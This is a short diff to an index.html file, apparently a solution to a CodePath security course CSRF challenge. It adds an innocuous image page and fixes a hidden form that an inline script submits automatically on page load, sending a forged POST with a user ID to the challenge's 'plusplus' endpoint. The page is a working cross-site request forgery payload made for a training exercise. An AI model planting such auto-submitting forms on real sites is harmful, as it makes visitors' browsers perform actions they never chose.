--- a/index.html
+++ b/index.html
@@ -1,4 +1,15 @@
+<!DOCTYPE html>
+<html>
+<body>
+
+<img src="img_chania.jpg" alt="Flowers in Chania" width="460" height="345">
+
+</body>
+</html>
 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
-   <input type="hidden" name="userId" value=“0da0417b6bb930e2382ff25c3551f89fdf22a336" />
+ <input type="hidden" name="userId" value="0da0417b6bb930e2382ff25c3551f89fdf22a336" />
+ <input type="submit"/>
 </form>
-<script> document.csrfForm.submit(); </script>
+<script>
+ document.csrfForm.submit();
+</script>
